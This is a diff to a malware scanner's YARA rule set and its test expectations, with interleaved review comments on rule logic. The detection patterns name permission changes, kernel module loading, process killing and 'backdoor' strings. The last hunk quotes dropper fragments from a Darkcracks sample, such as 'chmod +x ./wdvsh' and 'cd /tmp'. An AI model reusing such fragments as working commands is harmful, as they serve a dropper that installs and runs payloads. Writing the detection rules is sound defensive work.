@@ -0,0 +1,13 @@ +rule thingsboard_scripts_js : override { + meta: + description = "scripts.c88fecd373e21509.js" + infection_killer = "medium" + strings: + $delimited1 = "|kill|killall|" + $delimited2 = "|pkill|" + $minified_js1 = "!function(A,N)" + $minified_js2 = "throw new Error(\"Argument to polyad must be a positive number\");" + $minified_js3 = "throw new Error(\"Selector \"+G+\" did not match a DOM element\");" + condition: + filesize < 256KB and all of them +} diff --git a/rules/fs/file-make_executable.yara b/rules/fs/file-make_executable.yara index fb5189e8..0cf3dd65 100644 --- a/rules/fs/file-make_executable.yara +++ b/rules/fs/file-make_executable.yara @@ -19,8 +19,9 @@ rule chmod_executable_shell_binary : high { strings: $val = /chmod [\-\w ]{0,4}\+[rw]{0,2}x[ \$\@\w\/\.]{0,64}/ $val2 = /chmod [\-\w ]{0,4}\+[rw]{0,2}[75][ \$\@\w\/\.]{0,64}/ + $not_example = "try 'chmod +x'" condition: - filesize < 20MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of them + filesize < 20MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($val*) and none of ($not*) } rule chmod_executable_ruby : high { diff --git a/rules/fs/permission-modify-dangerous.yara b/rules/fs/permission-modify-dangerous.yara index 7ae0cbc5..1c4543ad 100644 --- a/rules/fs/permission-modify-dangerous.yara +++ b/rules/fs/permission-modify-dangerous.yara 
@@ -5,19 +5,20 @@ rule chmod_word_writeable : medium { strings: $ref = /chmod [\-\w ]{0,4}666[ \$\w\/\.]{0,32}/ condition: - $ref + filesize < 50MB and $ref } rule chmod_dangerous_exec : high exfil { meta: - description = "Makes a world writeable executable" + description = "Makes path world writeable and executable" hash_2023_APT31_1d60 = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2" hash_2023_Merlin_48a7 = "48a70bd18a23fce3208195f4ad2e92fce78d37eeaa672f83af782656a4b2d07f" hash_2023_Py_Trojan_NecroBot_0e60 = "0e600095a3c955310d27c08f98a012720caff698fe24303d7e0dcb4c5e766322" strings: $ref = /chmod [\-\w ]{0,4}777[ \$\w\/\.]{0,32}/ - $not_dev_shm = "chmod 1777 /dev/shm" + $not_chmod_1777 = "chmod 1777" + $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" condition: - $ref and not ($not_dev_shm and $not_chromium) + filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/kernel/module-load.yara b/rules/kernel/module-load.yara index c695e0e6..6c4b04a1 100644 --- a/rules/kernel/module-load.yara +++ b/rules/kernel/module-load.yara 
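Review bot: Switching `chmod_dangerous_exec` from `not ($not_dev_shm and $not_chromium)` to `none of ($not*)` changes the semantics, not only the string list: the old rule was suppressed only when both markers were present, the new one is suppressed by any single one, so a sample that runs `chmod 777` on a path and elsewhere a `chmod 1777`, or merely contains `CHROMIUM_TIMESTAMP`, is no longer reported at all. If that is intended, a `// ` comment above `$not_chromium` naming the sample it came from would stop the next reader from re-tightening it; otherwise keep the Chromium marker paired with the sticky-bit ones, e.g. `filesize < 50MB and $ref and not (any of ($not_chmod*) and $not_chromium)`.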
@@ -1,25 +1,38 @@ -rule init_module : medium { +rule init_module : medium linux { meta: - description = "Load Linux kernel module" + description = "Linux kernel module" syscall = "init_module" capability = "CAP_SYS_MODULE" hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410" hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "ko,elf,so" strings: $ref = "init_module" fullword condition: - all of them + filesize < 1MB and all of them } -rule kernel_module_loader : high { +rule kernel_module_loader : high linux { meta: + description = "loads Linux kernel module via insload" hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/ condition: - all of them + filesize < 10MB and all of them } + +rule cha_cha_tests : override linux { + meta: + description = "test_cipher.ko" + filetypes = "sh" + kernel_module_loader = "medium" + strings: + $test = "insmod test_cipher.ko size" + condition: + filesize < 2KB and any of them +} \ No newline at end of file diff --git a/rules/kernel/symbol-lookup.yara b/rules/kernel/symbol-lookup.yara index 7e540f5c..8774cc54 100644 --- a/rules/kernel/symbol-lookup.yara +++ b/rules/kernel/symbol-lookup.yara 
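Review bot: The new description `loads Linux kernel module via insload` misspells the tool; the rule's only string is `$insmod`, so it should read `description = "loads Linux kernel module via insmod"`. In `cha_cha_tests`, `any of them` over a single string reads less directly than `$test`, and the file now ends without a trailing newline (the `\ No newline at end of file` marker), which the other rule files touched by this commit keep.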
@@ -1,14 +1,17 @@ -rule kallsyms : high { +rule kallsyms : high linux { meta: description = "access unexported kernel symbols" ref = "https://lwn.net/Articles/813350/" hash_2023_FontOnLake_1F52DB8E3FC3040C017928F5FFD99D9FA4757BF8_elf = "efbd281cebd62c70e6f5f1910051584da244e56e2a3228673e216f83bdddf0aa" hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30" hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" + filetypes = "so,elf" strings: $ref = "kallsyms_lookup_name" fullword $not_bpf = "BPF_FUNC_kallsyms_lookup_name" + $not_linux_src = "GPL-2.0 WITH Linux" + $not_include = "#define " condition: - $ref and none of ($not*) + filesize < 1MB and $ref and none of ($not*) } diff --git a/rules/persist/bash.yara b/rules/persist/bash.yara index bb45dec5..242e23e1 100644 --- a/rules/persist/bash.yara +++ b/rules/persist/bash.yara @@ -24,6 +24,8 @@ rule bash_logout_persist : high { strings: $ref = ".bash_logout" $not_bash = "POSIXLY_CORRECT" + $not_comment = "# ~/.bash_logout" + $not_clear = "/usr/bin/clear_console" condition: filesize < 2097152 and any of ($ref*) and none of ($not*) } diff --git a/rules/process/chdir-unusual.yara b/rules/process/chdir-unusual.yara index aa5371e3..efa3c90d 100644 --- a/rules/process/chdir-unusual.yara +++ b/rules/process/chdir-unusual.yara 
@@ -1,26 +1,72 @@
+rule cd_tmp : medium {
+ meta:
+ description = "changes the current working directory to /tmp"
+ strings:
+ $d_tmp = "cd /tmp"
+ condition:
+ $d_tmp
+}
+
+rule cd_usr : medium {
+ meta:
+ description = "changes the current working directory to /usr"
+ strings:
+ $d_usr = /cd \/usr[\/\w\.]{0,16}/
+ condition:
+ $d_usr
+}
-rule unusual_cd_val : high {
+rule cd_mnt : medium {
 meta:
- description = "changes to an unusual system directory"
- hash_2023_Py_Trojan_NecroBot_0e60 = "0e600095a3c955310d27c08f98a012720caff698fe24303d7e0dcb4c5e766322"
- hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500"
- hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced"
+ description = "changes the current working directory to /mnt"
 strings:
 $d_mnt = "cd /mnt"
- $d_root = "cd /root"
+ condition:
+ any of ($d*)
+}
+
+rule cd_bin : high {
+ meta:
+ description = "changes the current working directory to bin directory"
+ strings:
 $d_bin = "cd /bin"
- $d_tmp = "cd /tmp"
- $d_usr = /cd \/usr[\/\w\.]{0,16}/
+ $d_sbin = "cd /sbin"
+ $d_usr_bin = "cd /usr/bin"
+ $d_usr_sbin = "cd /usr/sbin"
+ condition:
+ any of ($d*)
+}
+
+rule cd_root : high {
+ meta:
+ description = "changes the current working directory to /root"
+ strings:
+ $d_root = "cd /root"
+ condition:
+ any of ($d*)
+}
+
+rule cd_var : medium {
+ meta:
+ description = "changes the current working directory to /var"
+ strings:
+ $d_usr = /cd \/var[\/\w\.]{0,16}/
+ condition:
+ $d_usr
+}
+
+rule cd_var_subdir : high {
+ meta:
+ description = "changes current working directory to /var/{log,run,tmp}"
+ strings:
 $d_var_log = "cd /var/log"
 $d_var_run = "cd /var/run"
 $d_var_tmp = "cd /var/tmp"
- $not_usr_src = "cd /usr/src"
- $not_usr_include = "cd /usr/include"
 condition:
- any of ($d*) and none of ($not*)
+ any of ($d*)
 }
-rule unusual_cd_val_obsessive : critical {
+rule cd_val_obsessive : critical {
 meta:
 description = "changes directory to
multiple unusual locations"
 strings:
@@ -28,14 +74,15 @@ rule unusual_cd_val_obsessive : critical {
 $d_root = "cd /root"
 $d_bin = "cd /bin"
 $d_tmp = "cd /tmp"
+ $d_dev = "cd /dev"
 $d_slash = /cd \/[\; \|\&]/ fullword
 condition:
 3 of them
 }
-rule unusual_cd_dev_val : high {
+rule unusual_cd_dev : high {
 meta:
- description = "changes to an unusual system directory"
+ description = "changes the current working directory to /dev"
 hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
 hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
 hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
diff --git a/rules/procfs/self-cmdline.yara b/rules/procfs/self-cmdline.yara
index f65f3357..399712d2 100644
--- a/rules/procfs/self-cmdline.yara
+++ b/rules/procfs/self-cmdline.yara
@@ -1,5 +1,5 @@
-rule proc_self_cmdline : medium {
+rule proc_self_cmdline : medium linux {
 meta:
 description = "gets process command-line"
 pledge = "stdio"
diff --git a/rules/ref/ip_port.yara b/rules/ref/ip_port.yara
index fadcac2e..1ec73f08 100644
--- a/rules/ref/ip_port.yara
+++ b/rules/ref/ip_port.yara
@@ -12,6 +12,7 @@ rule hardcoded_ip_port : high {
 $not_meta = "169.254.169.254:80"
 $not_vnc = "10.10.10.10:5900"
 $not_azure_pgsql = "20.66.25.58:5432"
+ $not_wireguard = "127.212.121.99:999"
 $not_test = "def test_" fullword
 condition:
 any of ($ip*) and none of ($not*)
@@ -41,6 +42,7 @@ rule logfile : override {
 http_hardcoded_ip = "medium"
 exploiter = "medium"
 http_ip_url_with_exe = "medium"
+ filetypes = "txt,log,json"
 strings:
 $timestamp = "@timestamp"
 condition:
diff --git a/rules/ref/path/etc-initd.yara b/rules/ref/path/etc-initd.yara
index 2fc22686..b561d5fe 100644
--- a/rules/ref/path/etc-initd.yara
+++ b/rules/ref/path/etc-initd.yara
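Review bot: The new `cd_var` rule reuses the identifier from `cd_usr`: `$d_var = /cd \/var[\/\w\.]{0,16}/` and `condition: $d_var` would read correctly, whereas the current `$d_usr` name is misleading for a `/var` pattern. The split also drops the old `$not_usr_src` and `$not_usr_include` exclusions without carrying them into `cd_usr`, whose regex still matches `cd /usr/src` and `cd /usr/include`, so build and install scripts the removed `unusual_cd_val` deliberately ignored now fire `cd_usr` at medium; restoring the two `$not_*` strings there with `condition: $d_usr and none of ($not*)` keeps that behaviour. None of the seven new rules keeps the three `hash_2023_*` samples that `unusual_cd_val` documented; if they still match one of the split rules it would be better to move them than to lose them.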
@@ -1,19 +1,20 @@
-rule etc_initd : medium {
+rule etc_initd : medium linux {
 meta:
 description = "references /etc/init.d"
 strings:
 $ref = /etc\/init\.d\/[\w\/\.]{0,32}/ fullword
 condition:
- any of them
+ filesize < 50MB and any of them
 }
-rule etc_initd_short_file : high {
+rule etc_initd_short_file : high linux {
 meta:
 description = "references short filename within /etc/init.d"
 strings:
- $ref = /etc\/init\.d\/[\w\.]{2,4}/ fullword
- $not_sshd = "/etc/init.d/sshd"
+ $ref = /etc\/init\.d\/[\w\.]{1,3}/ fullword
 $not_rcd = "/etc/init.d/rc.d"
+ $not_init = "SCRIPTNAME=/etc/init.d/"
+ $header = "### BEGIN INIT INFO"
 condition:
- any of them and none of ($not*)
+ filesize < 50MB and $ref and none of ($not*) and not $header in (1..128)
 }
diff --git a/rules/ref/site/http-ip.yara b/rules/ref/site/http-ip.yara
index e162a7f9..178a10d6 100644
--- a/rules/ref/site/http-ip.yara
+++ b/rules/ref/site/http-ip.yara
@@ -11,6 +11,7 @@ rule http_hardcoded_ip : high exfil {
 $not_11 = "http://11.11.11"
 $not_192 = "http://192.168"
 $not_169 = "http://169.254"
+ $not_aria = "http://210.104.33.10/ARIA/"
 condition:
 $ipv4 and none of ($not*)
 }
diff --git a/rules/ref/words/backdoor.yara b/rules/ref/words/backdoor.yara
index 5a152bbd..6e87ba2c 100644
--- a/rules/ref/words/backdoor.yara
+++ b/rules/ref/words/backdoor.yara
@@ -1,3 +1,14 @@
+private rule wordlist {
+ strings:
+ $scorpion = "scorpion"
+ $superman = "superman"
+ $porsche = "porsche"
+ $cardinal = "cardinal"
+ $wombat = "wombat"
+ condition:
+ filesize < 100MB and 3 of them
+}
+
 rule backdoor : high {
 meta:
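Review bot: In `etc_initd_short_file` the new guard `not $header in (1..128)` starts its range at offset 1, so a file whose very first bytes are `### BEGIN INIT INFO` (no shebang line) is not excluded even though it is exactly the LSB-style init script the guard is meant to skip; `not $header in (0..128)` covers that case. Dropping `$not_sshd` is consistent with tightening the quantifier to `{1,3}`, but a comment on the `$ref` line such as `// 1-3 character names only; longer ones like sshd are ordinary services` would record why the exclusion went away.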
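Review bot: The private `wordlist` rule carries no comment saying what it recognises, and a reader of `not wordlist` in the `backdoor*` conditions cannot tell why `scorpion`/`superman`/`porsche`/`cardinal`/`wombat` were chosen; from the `ref/words/backdoor` removals in the zxcvbn and frequency_lists test expectations in this diff it appears to identify files that embed a common-password dictionary, where "backdoor" occurs as a password entry rather than as a capability. A one-line comment above the rule, `// files embedding a common-password list (e.g. zxcvbn frequency data) mention "backdoor" legitimately`, would capture that intent for the next maintainer. It is also worth noting in that comment that the `filesize < 100MB` bound here is what actually limits the exclusion, since `backdoor` and `backdoor_caps` cap at 40MB while `backdoor_leet` caps at 100MB.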
@@ -6,10 +17,42 @@ rule backdoor : high {
 hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30"
 hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6"
 strings:
- $ref = /[a-zA-Z\-_ ]{0,16}backdoor[a-zA-Z\-_ ]{0,16}/ fullword
+ $ref = /[a-zA-Z\-_ ]{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword
+ condition:
+ filesize < 40MB and any of them and not wordlist
+}
+
+rule backdoor_caps : high {
+ meta:
+ description = "References a 'BACKDOOR'"
+ hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
+ hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30"
+ hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6"
+ strings:
 $ref2 = /[a-zA-Z\-_ ]{0,16}BACKDOOR[a-zA-Z\-_ ]{0,16}/ fullword
- $ref3 = /[a-zA-Z\-_ ]{0,16}Backdoor[a-zA-Z\-_ ]{0,16}/
- $ref4 = /[a-zA-Z\-_ ]{0,16}backd00r[a-zA-Z\-_ ]{0,16}/
 condition:
- any of them
+ filesize < 40MB and any of them and not wordlist
+}
+
+rule backdoor_leet : critical {
+ meta:
+ description = "References a 'backd00r'"
+ hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
+ hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30"
+ hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6"
+ strings:
+ $ref4 = /[a-zA-Z\-_ ]{0,16}[bB][a4]ckd00r[a-zA-Z\-_ ]{0,16}/
+ condition:
+ filesize < 100MB and any of them and not wordlist
+}
+
+rule include_header : 
override linux {
+ meta:
+ description = "include header"
+ backdoor = "medium"
+ filetypes = "h"
+ strings:
+ $re = /\#define [A-Z0-9_]+_H/ fullword
+ condition:
+ filesize < 100KB and any of them
 }
diff --git a/rules/shell/tmp_semicolon.yara b/rules/shell/tmp_semicolon.yara
index 12ab4845..f4fbc63c 100644
--- a/rules/shell/tmp_semicolon.yara
+++ b/rules/shell/tmp_semicolon.yara
@@ -7,8 +7,19 @@ rule semicolon_short_tmp : high {
 hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0"
 strings:
 $tmp_before = /[\w\/ \-\;]{0,32} \/tmp\/[a-z]{1,5} {0,2};/
- $var_tmp_before = /[\w\/ \-\;]{0,32} \/var\/tmp\/[a-z]{1,5} {0,2};/
 $tmp_after = /[\w\/ \-]{0,32}; {0,2}\/tmp\/[a-z]{1,5}[\w\/ \-\&\;]{0,32}/
+ condition:
+ any of them
+}
+
+rule semicolon_short_var_tmp : high {
+ meta:
+ description = "unusual one-liners involving /var/tmp"
+ hash_2023_Unix_Coinminer_Xanthe_7ea1 = "7ea112aadebb46399a05b2f7cc258fea02f55cf2ae5257b331031448f15beb8f"
+ hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb"
+ hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0"
+ strings:
+ $var_tmp_before = /[\w\/ \-\;]{0,32} \/var\/tmp\/[a-z]{1,5} {0,2};/
 $var_tmp_after = /[\w\/ \-]{0,32}; {0,2}\/var\/tmp\/[a-z]{1,5}[\w\/ \-\&\;]{0,32}/
 condition:
 any of them
diff --git a/test_data/javascript/clean/203.b7219352.chunk.js.simple b/test_data/javascript/clean/203.b7219352.chunk.js.simple
new file mode 100644
index 00000000..e386ed08
--- /dev/null
+++ b/test_data/javascript/clean/203.b7219352.chunk.js.simple
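Review bot: `backdoor_leet`'s `$ref4 = /[a-zA-Z\-_ ]{0,16}[bB][a4]ckd00r[a-zA-Z\-_ ]{0,16}/` is the only pattern in the three new rules without `fullword`, so at critical severity it also fires on the substring inside longer identifiers; either append `fullword` to match `backdoor`/`backdoor_caps` or add a comment stating that partial matches are intended. The three `hash_2023_*` entries in `backdoor_caps` and `backdoor_leet` are copied verbatim from `backdoor` (whose header and first hash sit in the previous hunk); they documented samples matching the old combined rule, and nothing in this diff shows that each sample still matches the narrower `$ref2` or `$ref4`, so they should be re-verified or dropped. The same applies to `semicolon_short_var_tmp` in the `tmp_semicolon.yara` hunk on this line, which reuses all three hashes from `semicolon_short_tmp`. In `include_header`, `description = "include header"` says little; since `$re` matches a `#define …_H` guard macro, `description = "C/C++ include guard"` is more precise, and the `backdoor = "medium"` override would benefit from a comment stating whether it is meant to downgrade only `backdoor` or also `backdoor_caps`/`backdoor_leet`.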
@@ -0,0 +1,55 @@
+# javascript/clean/203.b7219352.chunk.js: medium
+combo/degrader/infection: medium
+compression/bzip2: low
+compression/gzip: low
+encoding/base64: low
+encoding/json/encode: low
+env/HOME: low
+env/LANG: low
+env/SHELL: low
+env/TEMP: low
+env/TERM: low
+env/USER: low
+exec/cmd: medium
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/file/write: low
+fs/mount: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/symlink/resolve: low
+fs/unmount: low
+kernel/platform: low
+net/dns/txt: low
+net/download: medium
+net/http/cookies: medium
+net/http/form/upload: medium
+net/http/post: medium
+net/interface/list: medium
+net/mac/address: medium
+net/sendfile: low
+net/sftp: medium
+net/socket/listen: low
+net/socket/send: low
+net/ssh: medium
+net/stat: medium
+net/upload: medium
+net/wireless: low
+persist/crontab: medium
+persist/pid_file: medium
+process/chroot: low
+process/username/get: medium
+ref/daemon: medium
+ref/program/powershell: medium
+ref/program/sudo: medium
+ref/site/url: low
+ref/words/agent: medium
+ref/words/heartbeat: medium
+ref/words/intercept: medium
+ref/words/password: low
+ref/words/plugin: low
+security_controls/linux/selinux: medium
+techniques/code_eval: medium
diff --git a/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple b/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple
new file mode 100644
index 00000000..487e1684
--- /dev/null
+++ b/test_data/javascript/clean/3937.844b09f50594ca2613b4.js.map.simple
@@ -0,0 +1,8 @@
+# javascript/clean/3937.844b09f50594ca2613b4.js.map: medium
+fs/directory/remove: low
+fs/file/copy: medium
+fs/file/delete: medium
+net/fetch: medium
+obfuscation/powershell/bxor: medium
+ref/program/powershell: medium
+ref/site/url: low
diff --git a/test_data/javascript/clean/bash.js.simple b/test_data/javascript/clean/bash.js.simple
new file mode 100644
index 00000000..3c667b57
--- /dev/null
+++ b/test_data/javascript/clean/bash.js.simple
@@ -0,0 +1,26 @@
+# javascript/clean/bash.js: medium
+combo/degrader/infection: medium
+combo/recon/system_network: medium
+compression/bzip2: low
+compression/gzip: low
+env/SHELL: low
+env/TERM: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/unmount: low
+kernel/platform: low
+net/interface/list: medium
+net/sftp: medium
+net/ssh: medium
+net/stat: medium
+persist/crontab: medium
+process/chroot: low
+process/username/get: medium
+ref/program/sudo: medium
+ref/site/url: low
+security_controls/linux/selinux: medium
diff --git a/test_data/javascript/clean/frequency_lists.js.simple b/test_data/javascript/clean/frequency_lists.js.simple
index 69d7dced..eb030275 100644
--- a/test_data/javascript/clean/frequency_lists.js.simple
+++ b/test_data/javascript/clean/frequency_lists.js.simple
@@ -18,7 +18,6 @@ process/username/get: medium
 ref/daemon: medium
 ref/program/minecraft: medium
 ref/words/agent: medium
-ref/words/backdoor: high
 ref/words/dropper: medium
 ref/words/exploit: medium
 ref/words/heartbeat: medium
diff --git a/test_data/javascript/clean/index.js.map.simple b/test_data/javascript/clean/index.js.map.simple
new file mode 100644
index 00000000..3acb1df3
--- /dev/null
+++ b/test_data/javascript/clean/index.js.map.simple
@@ -0,0 +1,11 @@
+# javascript/clean/index.js.map: medium
+crypto/aes: low
+encoding/base64: low
+encoding/json/decode: low
+encoding/json/encode: low
+net/http/auth: low
+net/http/form/upload: medium
+net/http/post: medium
+net/url: low
+ref/site/url: low
+ref/words/ransomware/lvt: medium
diff --git a/test_data/javascript/clean/prism-bash.js.simple b/test_data/javascript/clean/prism-bash.js.simple
new file mode 100644
index 00000000..3e42e7d0
--- /dev/null
+++ b/test_data/javascript/clean/prism-bash.js.simple
@@ -0,0 +1,26 @@
+# javascript/clean/prism-bash.js: medium
+combo/degrader/infection: medium
+combo/recon/system_network: medium
+compression/bzip2: low
+compression/gzip: low
+env/SHELL: low
+env/TERM: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/unmount: low
+kernel/platform: low
+net/interface/list: medium
+net/sftp: medium
+net/ssh: medium
+net/stat: medium
+persist/crontab: medium
+process/chroot: low
+process/username/get: medium
+ref/program/sudo: medium
+ref/site/url: low
+security_controls/linux/selinux: medium
diff --git a/test_data/javascript/clean/prism-bash.min.js.simple b/test_data/javascript/clean/prism-bash.min.js.simple
new file mode 100644
index 00000000..cb129825
--- /dev/null
+++ b/test_data/javascript/clean/prism-bash.min.js.simple
@@ -0,0 +1,26 @@
+# javascript/clean/prism-bash.min.js: medium
+combo/degrader/infection: medium
+combo/recon/system_network: medium
+compression/bzip2: low
+compression/gzip: low
+env/SHELL: low
+env/TERM: low
+fd/multiplex: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/unmount: low
+kernel/platform: low
+net/interface/list: medium
+net/sftp: medium
+net/ssh: medium
+net/stat: medium
+persist/crontab: medium
+process/chroot: low
+process/username/get: medium
+ref/program/sudo: medium
+security_controls/linux/selinux: medium
diff --git a/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple b/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple
new file mode 100644
index 00000000..c8e1e4d5
--- /dev/null
+++ b/test_data/javascript/clean/scripts.c88fecd373e21509.js.simple
@@ -0,0 +1,34 @@
+# javascript/clean/scripts.c88fecd373e21509.js: medium
+combo/degrader/infection: medium
+combo/recon/system_network: medium
+compression/bzip2: low
+compression/gzip: low
+encoding/json/decode: low
+encoding/json/encode: low
+env/SHELL: low
+env/TERM: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/mount: low
+fs/node/create: low
+fs/permission/modify: medium
+fs/quota/manipulate: low
+fs/swap/on: low
+fs/unmount: low
+kernel/platform: low
+net/interface/list: medium
+net/sftp: medium
+net/ssh: medium
+net/stat: medium
+net/url: low
+obfuscation/js/high_entropy: medium
+persist/crontab: medium
+process/chroot: low
+process/username/get: medium
+ref/program/powershell: medium
+ref/program/sudo: medium
+ref/site/url: low
+ref/words/plugin: low
+security_controls/linux/selinux: medium
+techniques/code_eval: medium
diff --git a/test_data/javascript/clean/securityDashboards.plugin.js.simple b/test_data/javascript/clean/securityDashboards.plugin.js.simple
index 516a65af..41f72421 100644
--- a/test_data/javascript/clean/securityDashboards.plugin.js.simple
+++ b/test_data/javascript/clean/securityDashboards.plugin.js.simple
@@ -1,4 +1,4 @@
-# javascript/clean/securityDashboards.plugin.js: critical
+# javascript/clean/securityDashboards.plugin.js: high
 3P/threat_hunting/crowbar: medium
 3P/threat_hunting/hijacker: medium
 3P/threat_hunting/johntheripper: medium
@@ -29,7 +29,6 @@ ref/daemon: medium
 ref/program/minecraft: medium
 ref/site/url: low
 ref/words/agent: medium
-ref/words/backdoor: high
 ref/words/dropper: medium
 ref/words/exploit: medium
 ref/words/heartbeat: medium
diff --git a/test_data/javascript/clean/zxcvbn.js.simple b/test_data/javascript/clean/zxcvbn.js.simple
index 6b897798..bc9ddd9f 100644
--- a/test_data/javascript/clean/zxcvbn.js.simple
+++ b/test_data/javascript/clean/zxcvbn.js.simple
@@ -20,7 +20,6 @@ ref/daemon: medium
 ref/path/relative: medium
 ref/program/minecraft: medium
 ref/words/agent: medium
-ref/words/backdoor: high
 ref/words/dropper: medium
 ref/words/exploit: medium
 ref/words/heartbeat: medium
diff --git a/test_data/linux/2023.Kinsing/install.sh.simple b/test_data/linux/2023.Kinsing/install.sh.simple
index 76eb1e32..068e9f41 100644
--- a/test_data/linux/2023.Kinsing/install.sh.simple
+++ b/test_data/linux/2023.Kinsing/install.sh.simple
@@ -8,8 +8,8 @@ admin/logs/syslog: medium
 admin/package/install: medium
 combo/backdoor/iptables: medium
 combo/backdoor/kill_rm: medium
-combo/critical_paths: medium
 combo/degrader/infection: critical
+combo/degrader/linux_paths: high
 combo/degrader/selinux_firewall: high
 combo/degrader/ufw: high
 combo/dropper/http_ip_temp: critical
diff --git a/test_data/linux/2024.Darkcracks/darkcracks.sh.md b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
index 1a248728..9aaa418a 100644
--- a/test_data/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
@@ -5,7 +5,7 @@
 | CRITICAL | [combo/dropper/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
